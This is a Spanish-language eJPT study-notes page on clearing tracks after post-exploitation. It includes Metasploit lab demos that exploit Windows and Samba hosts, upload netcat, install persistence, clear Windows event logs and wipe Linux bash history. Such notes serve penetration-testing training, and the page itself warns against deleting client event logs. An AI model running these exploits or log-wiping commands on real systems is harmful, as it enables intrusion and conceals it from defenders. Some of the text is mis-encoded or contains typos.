eJPT
  • 馃憢Welcome
  • Tools
    • 馃敪Escaneo y Enumeraci贸n
  • SECTION 1: Assessment Methodologies
    • Assessment Methodologies: Information Gathering
      • Introducci贸n a la Recopilaci贸n de Informaci贸n
        • Start Quiz
      • Passive Information Gathering
      • Active Information Gathering
    • Assessment Methodologies: Footprinting & Scanning
      • Introduction
      • Networking Primer
      • Host Discovery
      • Port Scanning
      • Evasion, Scan Performance & Output
      • Page
      • Challenges
    • Assessment Methodologies: Enumeration
      • Overview
      • SMB Lesson
      • FTP Lesson
      • SSH Lesson
      • HTTP Lesson
      • SQL Lesson
    • Assessment Methodologies: Vulnerability Assessment
      • Vulnerability Assessment
      • Course Labs
  • SECTION 2: Host & Networking Auditing
    • Assessment Methodologies: Auditing Fundamentals
      • Assessment Methodologies
      • Practice
  • SECTION 3: Host & Network Penetration Testing
    • Host & Network Penetration Testing: System/Host Based Attacks
      • Introduction to Attacks
      • Windows Vulnerabilities
      • Exploiting Windows Vulnerabilities
      • Windows Privilege Escalation
      • Windows File System Vulnerabilities
      • Windows Credential Dumping
      • Linux Vulnerabilities
      • Exploiting Linux Vulnerabilities
      • Linux Privilege Escalation
      • Linux Credential Dumping
      • Conclusion
    • Host & Network Penetration Testing: Network-Based Attacks
      • Network-Based Attacks
    • Host & Network Penetration Testing: The Metasploit Framework (MSF)
      • Metasploit
        • Metasploit Fundamentals
      • Information Gathering & Enumeration
        • Nmap
        • Enumeration
      • Vulnerability Scanning
        • MSF
        • Nessus
        • Web Apps
      • Client-Side Attacks
        • Payloads
        • Automating
      • Exploitation
        • Windows Exploitation
        • Linux Exploitation
        • Post Exploitation Fundamentals
        • Windows Post Exploitation
        • Linux Post Exploitation
      • Armitage
        • Metasploit GUIs
    • Host & Network Penetration Testing: Exploitation
      • Introduction To Exploitation
      • Vulnerability Scanning Overview
      • Exploits
        • Searching For Exploits
        • Fixing Exploits
      • Shells
      • Frameworks
      • Windows
      • Linux
      • Obfuscation
    • Host & Network Penetration Testing: Post-Exploitation
      • Introduction
      • Windows Enumeration
      • Linux Enumeration
      • Transferring Files
      • Shells
      • Escalation
        • Windows Privilege Escalation
        • Linux Privilege Escalation
      • Persistence
        • Windows Persistence
        • Linux Persistence
      • Dumping & Cracking
        • Windows Password Hashes
        • Linux Password Hashes
      • Pivoting Lesson
      • Clearing
  • Host & Network Penetration Testing: Social Engineering
    • Social Engineering
  • SECTION 4: Web Application Penetration Testing
    • Introduction to the Web & HTTP Protocol
      • Web Applications
      • HTTP Protocol
        • HTTP/S Protocol Fundamentals
        • Website Crawling & Spidering
Powered by GitBook
On this page
  • Clearing Your Tracks On Windows
  • Demo: Clearing Your Tracks On Windows
  • Quiz: Clearing Your Tracks On Windows
  • Clearing Your Tracks On Linux
  • Demo: Clearing Your Tracks On Linux
  • Quiz: Clearing Your Tracks On Linux
  1. SECTION 3: Host & Network Penetration Testing
  2. Host & Network Penetration Testing: Post-Exploitation

Clearing

Clearing Your Tracks On Windows

Las fases de explotaci贸n y post-explotaci贸n de una prueba de penetraci贸n implican interactuar activamente con los sistemas de destino y los datos almacenados en estos sistemas.

Como resultado, es posible que se le solicite que borre o deshaga los cambios que haya realizado en los sistemas de destino que ha comprometido seg煤n las pautas especificadas en las reglas de interacci贸n.

Si ha transferido archivos a los sistemas de destino que ha comprometido, lleve un registro de d贸nde se han guardado para poder eliminarlos cuando haya terminado.

Una buena pr谩ctica es almacenar todos sus scripts, exploits y binarios en el directorio C:/Temp en Windows y en el directorio /tmp en Linux.

Tambi茅n es importante tener en cuenta el marco de explotaci贸n que se est谩 utilizando; un ejemplo de esto es MSF, que es conocido por generar y almacenar artefactos en el sistema de destino cuando se utilizan m贸dulos de explotaci贸n o post.

Algunos m贸dulos MSF bien dise帽ados le proporcionan instrucciones y secuencias de comandos de recursos que le proporcionan informaci贸n sobre d贸nde se almacenan los artefactos y c贸mo se pueden eliminar.

En el contexto de Windows, una t茅cnica t铆pica de postexplotaci贸n pertinente para limpiar sus huellas es eliminar el Registro de eventos de Windows. Esto es algo que se debe evitar durante una prueba de penetraci贸n, ya que el Registro de eventos de Windows almacena una gran cantidad de datos que son importantes para el cliente para el que se est谩 realizando la prueba de penetraci贸n.

Demo: Clearing Your Tracks On Windows

# Explotamos la maquina de la victima
msf6 exploit(windows/http/badbtue_passthru) > exploit
meterpreter > sysinfo
meterpreter > getuid
# Crear un directorio temporal en la unidad C y acceder al mismo
meterpreter > pwd
C:\Temp
meterpreter > upload /usr/share/windows-binaries/nc.exe
meterpreter > ls
meterpreter > rm nc.exe
meterpreter > ls

msf6 exploit (windows/httplbadbtue passthru) > search persistence platform:windows
msf6 exploit (windows/httplbadbtue passthru) > use 2
msf6 exploit (windows/httplbadbtue passthru) > explolit
# Cuando se ejecuta el exploit podra ver que le proporciona
# informacion para limpiar lo que creo el mismo
# eso incluye servicios ejecutables y cualquier otro rastro
# NO SE RECOMIENDA DEJAR RASTROS DEBIDO A QUE OTRO ATACANTE LO PUEDE APROVECHAR
# conocer bien de todos los artefactos que se crean
# Para ejectar el comando
resource cleanup.rc

# Limpiar los eventos de eventViewer de windos
meterpreter > clearev

Quiz: Clearing Your Tracks On Windows

Clearing Your Tracks On Linux

Demo: Clearing Your Tracks On Linux

nmap -sV -p 445 192.143.174.3

msf5 > use exploit/linux/samba/is_known_pipename
msf5 exploit(linux/samba/is_known_pipename) > show options
msf5 exploit(linux/samba/is_known_pipename) > exploit
/bin/bash -i

root@victim-l:/# cd /tmp
root@victim-l:/tmp# ls

# Normalmente se alacaneara el historial de comandos en el archivo
.nashrc

root@victim-l:/root# echo "1 cd /tmp" > .bash_history

# Borrar el historial de comandos
history -c

# Tambien puede ejecutar el siguiente comando
root@victim-l:/root# cat /dev/null > .bash_history
history -c



Quiz: Clearing Your Tracks On Linux

PreviousPivoting LessonNextHost & Network Penetration Testing: Social Engineering

Last updated 8 months ago